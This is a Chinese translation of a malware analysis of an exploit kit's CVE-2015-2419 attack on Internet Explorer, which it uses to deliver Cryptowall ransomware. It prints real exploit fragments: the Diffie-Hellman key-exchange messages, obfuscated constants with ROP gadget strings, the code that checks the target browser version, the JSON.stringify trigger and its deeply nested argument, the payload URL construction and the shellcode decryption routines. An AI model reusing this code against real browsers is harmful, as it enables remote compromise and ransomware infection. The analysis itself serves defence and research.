钓鱼工具包(EK)支持CVE-2015-2419漏洞
钓鱼工具包(EK)最近增加针对IE浏览器的CVE-2015-2419漏洞的支持,该漏洞刚刚于今年七月得到修复。迅速利用刚刚修复的漏洞,一直是钓鱼工具包EK作者的惯用做法,只不过自从2014年下半年开始,他针对的目标一直是Adobe Flash Player 罢了。CVE-2015-2419漏洞是钓鱼工具包进来采用得第二个非Flash漏洞,第一个是Silverlight中的CVE-2015-1671漏洞。这可能是Adobe在Flash Player中采用的新漏洞缓解技术的结果,该技术能够阻止攻击者利用Vector(或类似)对象来控制被破坏的Flash进程。到目前为止,钓鱼工具包已经能够根据目标的具体环境,来利用其上的Flash、IE和Silverlight漏洞了。此外,钓鱼工具包还给它的IE利用代码添加了新的混淆加密技术。登陆页面每次运行时,必须从服务器取得密钥和部分数据后才能够执行漏洞攻击。 这些信息只会发送给受害者一方,即有漏洞的浏览器,并且通过自编的Diffie-Hellman提供XTEA保护。
利用Diffie-Hellman密钥交换协议保护IE漏洞利用代码的交付过程
钓鱼工具包的登陆页面已经使用HTML和Javascript进行了混淆处理。去掉第一层混淆之后,登陆页面会设法了解平台环境,选择需要使用的漏洞利用程序并启动它。对于该IE漏洞利用来说,它进行了两次混淆处理,并使用共享密钥(Diffie-Hellman(D-H)加密系统针对每个受害者的机器对利用代码进行了不同的处理。 这个加密系统是利用jsbn.js库实现的,这个库与cryptico.js颇为相似。
受害者的浏览器会利用POST向攻击者的服务器发送如下所示的JSON。这里使用的命名规则遵循Diffie–Hellman协议的命名规则,其中g是基数,p是模数,A是(g**a_) mod p的余数,其中a_是受害者的秘密指数,不得泄露。 但是,系统对这些值的安全性的关注还是不够,因为这些值是通过Math.random选出来的,而该函数从密码学上来讲是不安全的,此外,数值也太小,并且没有经过素性测试。 数值v源于ScriptEngineBuildNumber(),即jscript9的版本标识。
{"g":"78ab123a5d20fda81a9420c241a79f4f","A":"268e38c96cf54350d45537fc97c7
d526","p":"3a5d2e4d0b5a2d2a6b7e2d4e3a8e3c5d","v":"17840"}
攻击者使用如下所示的base64编码的版本。B是攻击者的 D-H应答(即(g**b_) mod p,其中b_是攻击者的秘密指数,该指数不能通过网络传输)。 K是破译B所需密钥的加密版本。攻击者通过XTEA利用D-H的共享密钥(s = (A**b_) mod p)来加密一个随机密钥。 受害者利用XTEA解密k,然后解密b。
{"B":"194ff891862b55d9f1cf5ce4a10f7f92","k":"GulSjPCeuXPcH%2BvwrHjzew%3D%3D","b":"liTB9J%2FghlAzk%2Bp9Kgbg0Y85WPNx1N0jP8u7qPuXo…”}
B用来保存这个漏洞利用代码其他部分(完整的代码见附录部分)用到的一些常量。 这些常量需要通过两次重定向才能够访问,攻击者之所以这样做,可能是为了防止别人对整个利用代码进行静态分析。因为如此以来,静态分析可以了解代码流程,却无法了解这些常量 例如ur0pqm8kx是解码shellcode的口令,stringify是从JSON调用的方法的名称。
{"ll":"length","l":"charCodeAt","I":"fromCharCode","Il":"floor","IlI":"random","lI":"str ingify","lII":"location","II":"host","llI":"number","lll":"ScriptEngineBuildVersion","lIl" :"ScriptEngineMajorVersion","IIl":"ScriptEngineMinorVersion","Ill":"setInterval","III ":"clearInterval","lIlI":"ur0pqm8kx",…}
此外,由于缺乏D-H密钥,所以无法重现这些利用代码文件。这时,D-H g、A和p都是随机生成的,所以跟攻击者原来的响应无法匹配。 因此,解出来的D-H共享密钥也是错误的,因为k和b就是错误的,所以这个漏洞利用代码根本无法运行。很明显,要想观察这个攻击过程,需要:
1)破解密码2)破解PRNG3)做活体实验
目前我们还不清楚为什么攻击者只是针对常数值进行保护,而非针对整个漏洞利用代码。初步判断,他们可能是为了避免不必要的麻烦。
CVE-2015-2419漏洞详情
CVE-2015-2419是jscript9本地JSON API中的一种双释放(double free)漏洞,该漏洞已经在今年7月被修复了。具体来说,该漏洞在JSON.stringify解析深度嵌套的JSON数据时发生的。攻击者提供给JSON.stringify的完整参数如附录所示。Il1I4['prototype'].yc =
function(a) { if (!a.ma(!1)) throw new Error(3); a.kb(!1); a.ib(!1); JSON["stringify"](this.Pc, this.uc); a.ob(!1); CollectGarbage() };
验证浏览器版本
这个利用代码依赖于jscript9.dll的特定版本。在上面解码的JSON响应中,我们可以看到不同版本jscript9.dll对应于不同的密钥对。
"llIlII:{"17416":4080636,"17496":4080636,"17631":4084748,"17640":4084748,"1
7689":4080652,"17728":4088844,"17801":4088844,"17840":4088840,"17905":40
88840}
我们可以从下列代码中确认目标版本号:
try { var c = a.D["ScriptEngineMajorVersion"](), d = a.D["ScriptEngineMinorVersion"]() e = a.D["ScriptEngineBuildVersion"](), b = c == 11 && d == 0 && e <= 17905; } catch(f) {} if (!b) throw new Error(-1, window["ScriptEngineBuildVersion"] ? '' + window["ScriptEngineBuildVersion"]() : '');
Shellcode解密阶段
Shellcode位于去混淆之后的IE漏洞利用代码中,但是它是以加密形式存在的,对应的解密密钥可以从上面解码后的JSON响应中得到。 就本例而言,解密密钥是ur0pqm8kx。
解密例程见附录II。
有效载荷阶段
这个最新的IE漏洞被用来下载勒索软件Cryptowall,该软件类似于钓鱼工具包的变种,是近几个月才被发现的。有效载荷的下载,是以加密的形式通过网络传输的。 下载有效载荷的URL如下所示:
url = "https:// + window[location][host] + / + base64_decode(a)";
这里,a是从上面解码的JSON响应中得到的,就本例而言,它是xexec。
此外,Xexec()是一个自定义的函数,它的作用是,从工具包的登陆页上面取得密钥,然后解码取得有效载荷所需的路径。
String['prototype']['xexec'] = function() {
return decryption_routine(encrypted_path)
这里的Encrypted_path位于工具包的登陆页面上。
encrypted_path = 'F1om1GGamPpL2dyVZZs0U9vmNWGZmPEJVbw8Rcy95wymVmWJGZwZVYlZVN9
Rhl03lCGSnZibzahZ1duzU14Td2WcUbWPXT0VBLVmsFpW53mbWauYWenJ9Y0mZ
lFVlVFM0XPV3ThBJPO1I G 0 Z tp M 2';
利用附录1提供的解密例程,可以解码如下所示的base64编码数据:
decrypted_path = ZmF0aGVyLm1odG1sP2ZpcmU9ZW8wJmNvbG9yPVRENm5RJmZlZGVyYWw9ZVVw
d3hzSCZhbnl0aGluZz1iLTUmc2V0PUd4TW1VbXBWYWsmb3JnYW5pemF0aW9uPV
Z1MVBhV0lFTFlOX3JPMGI2Z0pt
解码后得到:
" father.mhtml?fire=eo0&color=TD6nQ&federal=eUpwxsH&anything=b-5&set=GxMmUmpVak&organization=Vu1PaWIELYN_rO0b6gJm"
这就是有效载荷对应的路径。
从上面的路径中得到的有效载荷是经过加密处理的。所以,shellcode需要使用XTEA算法来进行解密处理。 所用的XTEA密钥位于去混淆后的HTML页面中。就本例而言,它为Du9JOBgkbfzGvmFF。
附录I
这里是获得有效载荷路径的解密例程。密钥位于工具包登陆页面中。
window["osSnUV"] = new Function ('text', "var cryptKey = key, rawArray = cryptKey.split(''), sortArray = cryptKey.split(''), keyArray=[];sortArray.sort(); var keySize = sortArray.length;for (var i=0; i<keySize; i++) {keyArray."+p+"(rawArray."+i+"(sortArray[i]));}var k = keySize - text.length % keySize;for(var l = 0; l<k;l++) {text += ' ';} var endStr = '', i,j,line,newLine;for (i = 0; i < text.length; i += keySize) {line = text.substr(i,keySize).split('');newLine = '';for (j = 0; j < keySize; j++){newLine += line[keyArray[j]];}endStr = endStr + newLine;}endStr=endStr.replace(/\\s/g,'');return endStr;");
附录II
下面是用来获得shellcode的RC4解密例程,具体如下所示:
function DecryptionRoutine(key, encrypted_shellcode) { var d = [], e = 0, f, decrypted_shellcode = ''; for (h = 0; h < 256; h++) { d[h] = h; } for (h = 0; h < 256; h++) { e = (e + d[h] + key.charCodeAt(h % key.length)) % 256; f = d[h]; d[h] = d[e]; d[e] = f; } for (var k = e = h = 0; k < encrypted_shellcode.length; k++) { h = (h + 1) % 256; e = (e + d[h]) % 256; f = d[h]; d[h] = d[e]; d[e] = f; decrypted_shellcode += String.fromCharCode(encrypted_shellcode.charCodeAt(k) ^ d[(d[h] + d[e]) % 256]); } return decrypted_shellcode; }
附录III
常量b的内容如下所示:
{"ll":"length","l":"charCodeAt","I":"fromCharCode","Il":"floor","IlI":"random","lI":"str ingify","lII":"location","II":"host","llI":"number","lll":"ScriptEngineBuildVersion","lIl" :"ScriptEngineMajorVersion","IIl":"ScriptEngineMinorVersion","Ill":"setInterval","III ":"clearInterval","lIlI":"ur0pqm8kx”,"IlII":"https://","lllI":/","lIIl":"u","IlIl":"x","llll":"xexec","Illl":"EAX","lIII":"ECX","IIIl":"EDI","IllI":"ESP", "IIlI":"XCHG EAX,ESP","IIll":"MOV [ECX+0C],EAX","llIl":"CALL [EAX+4C]","llII":"MOV EDI,[EAX+90]","IIII":"a","lIll":"kernel32.dll","lIlll":"virtualprotect","IIIlI":11,"lIIll":0,"l llll":17905,"lIllI":500,"llIIl":16,"IlIII":0,"IIIll":1,"IIlII":2,"lIlII":3,"IllIl":4,"lllIl":5, "IIlll":8,"lIlIl":9,"lIIIl":10,"IllII":11,"lIIlI":12,"IlIll":16,"IIIIl":24,"IlIlI":100,"IIIII":1, "llIlI":2,"lllII":2147483647,"llIll":4294967295,"IIllI":255,"llIII":256,"lIIII":65535,"IIlIl":167 76960,"IlIIl":16777215,"llllI":4294967040,"IlllIl":4294901760,"Illll":4278190080,"IlllI":65280,"l lllIl":16711680,"lllIlI":19,"llIIII":4096,"IIIIIl":4294963200,"IIlllI":4095,"llIIlI":14598366, "IIllIl":48,"llIIll":32,"IIIllI":15352,"llIlll":85,"lIIIII":4096,"IllllI":400,"lIIlII":311296000, "IIIlIl":61440,"llllII":24,"IIIIll":32,"IlIlIl":17239,"lllllI":15,"IllIll":256,"llIllI":76, "lllIll":144,"lIlIIl":17416,"IlIIll":65536,"IIlIll":100000,"lIlllI":28,"IIlIlI":60,"lIlIII":44, "IIIlll":28,"IllIII":128,"lllIIl":20,"lIIIll":12,"lIlIlI":16,"IIlIIl":4,"IlIIIl":2,"lIllll":110, "IIIlII":64,"IllIlI":-1,"lIIIIl":0,"IllIlII":1,"lIIlll":2,"IlIlll":3,"IIlIII":4,"lIllIl":5,"IIllll" :7,"IIIIII":9,"lIlIll":10,"IlllII":11,"lIllII":12,"Illlll":-2146823286,"lIIIlI":[148,195],"lIIlIl":[137,65,12,195],"IIllII":[122908,122236,125484,2461125,208055,1572649,249826,271042,98055,62564,162095,163090,340146,172265, 163058,170761,258290,166489,245298,172955,82542],"IlIIII":[150104,149432,152680,3202586,214836,3204663,361185,285227,103426,599295,365261,226292,410596, 180980,226276,179716,320389,175621,307381,792144,183476],"IIIIlI":48,"IIIlIlI":57,"lllIII":65,"IllIIl" :90,"IlIlII":97,"llllll":122,"IlIllI":16640,"llIlIl":23040,"IlIIlI":4259840,"lIIIIlI":5898240,"llIIIl": 1090519040,"llIIIII":1509949440,"IlIIIlI":32,"IIIlllI":8192,"lllllII":2097152,"IIIllll":536870912,"llIlII":{"17416":4080636,"17496":4080636,"17631":4084748,"17640":4084748,"17689":4080652,"17728":4088844, "17801":4088844,"17840":4088840,"17905":4088840
附录IV
攻击者为了利用CVE-2015-2419而给JSON.stringify选择的参数:
Pc = {"a0":{"a0":{"a0":{"a0":{"a0":{"a0":{"a0":{"a0":"8HEQ36D4","a1":"7UI7T5FN","a2":"RFM8ORW8","a3":"G50CEWBI","a4":"BL30110U","a5":"AWE8A46R","a6": "058MT5M1","a7":"QNG7RWBF","a8":"FBQL54XA","a9":"574180FM","a10":"6YCTSRH0","a11":"N0AJ34YX","a12": "AO7CY3D4","a13":"T5XHR4I0","a14":"784508S8","a15":"4TLC3Q4L","a16":"U7A102Q4","a17":"3466F3UR", "a18":"356Q7028","a19":"8136URQ8"},"a1":"75C4SKMN","a2":"4LD2OP8P","a3":"UI55N7Y4","a4":"J10L02PV", "a5":"PEK6K2W7","a6":"U5C1L0YL","a7":"K2YWU745","a8":"J4725E35","a9":"OF1WR0HJ","a10":"505TBO78", "a11":"W48VSPHX","a12":"X83O3FW0","a13":"U68L8DNA","a14":"187V522Y","a15":"37N768W4","a16":"V66R2D77", "a17":"85QG6W2E","a18":"81JF5PF7","a19":"7B75IS0S"},"a1":"KBG32EST","a2":"2VN32W7B","a3":"4KT5JVBS", "a4":"EDPUH4AO","a5":"3A430Q13","a6":"2I5D2250","a7":"41OTHIHR","a8":"CWP0EVCJ","a9":"HLYOGE5X", "a10":"B3AIE208","a11":"L6AFDY71","a12":"5846CMKV","a13":"3S5DVV2T","a14":"7K5GFF8C","a15":"8YP7WBS2" ,"a16":"5X4EP78P","a17":"88574V1B","a18":"DJ7E8H06","a19":"VG7VN4HY"},"a1":"7P0RT015","a2":"IQPV6IKK", "a3":"2131VW84","a4":"Y81VNW8D","a5":"TUH60UNR","a6":"52S3R10G","a7":"8J37MCEV","a8":"0737UXB3","a9" :"6W4HEW6L","a10":"2C182X5P","a11":"K2CJ5VIK","a12":"C5LQLKDA","a13":"L1600HY7","a14":"U0MRETE5","a15" :"1654VHP0","a16":"1K500GJV","a17":"MI20FAM5","a18":"8V4252VN","a19":"34NQB53F"},"a1":"R88W7ICS","a2" :"VKC0041R","a3":"I28APIDN","a4":"F7FI27O2","a5":"0N8F1K5S","a6":"L811MVQO","a7":"34DAN88P","a8": "U0885VRN","a9":"68MPG5T2","a10":"BP55YBYF","a11":"TQT3BWD6","a12":"Y51M3LHU","a13":"FB4P602U","a14" :"J1N2KO31","a15":"THM817A4","a16":"E4J5A6MH","a17":"L4748S67","a18":"0FELJF2W","a19":"7220PJ14"}, "a1":"4GV2J5RI","a2":"RVA6S111","a3":"X1N0RG08","a4":"EH8013F5","a5":"0BA3XJQT","a6":"H2HX3IJ8", "a7":"2HC268X4","a8":"015L1E33","a9":"ELO6IGC5","a10":"70KTQ6HM","a11":"1M6IX20K","a12":"X64LGJKK", "a13":"LBX0KLU7","a14":"5Y8O5731","a15":"6QPRW517","a16":"B1C4PIJ8","a17":"6OS8GCER","a18":"1665C783" ,"a19":"0T08F051"},"a1":"L6U0I741","a2":"UC82L302","a3":"3WYW46B4","a4":"KY1U5C7B","a5":"O3IX8D40", "a6":"332Q0M74","a7":"7G78UVO7","a8":"6RFVUK6J","a9":"RUCN6WD5","a10":"VLCI7Y3Y","a11":"N04O0IC8", "a12":"UJGIQ8PG","a13":"IQ3CM3HA","a14":"PD8X1412","a15":"475LEQ6N","a16":"4P57I841","a17": "0U3F5AS8","a18":"57F7OPCG","a19":"16B8JB47"},"a1":"15LTQ001","a2":"1KHWV333","a3":"2JD25FM5","a4" :"0BYDYLPW","a5":"NIIV0JT2","a6":"JDL3RW02","a7":"QR3BG505","a8":"MY755QR4","a9":"EXFVX4HK","a10" :"HP3C3671","a11":"8DC42C1H","a12":"33XW2482","a13":"275B431C","a14":"DQBOT0OX","a15":"VPEC8AK4" ,"a16":"7P8E7VCI","a17":"DVDDFV3J","a18":"U22T484L","a19":"722C31R2"} uc = function (a, b) { return b }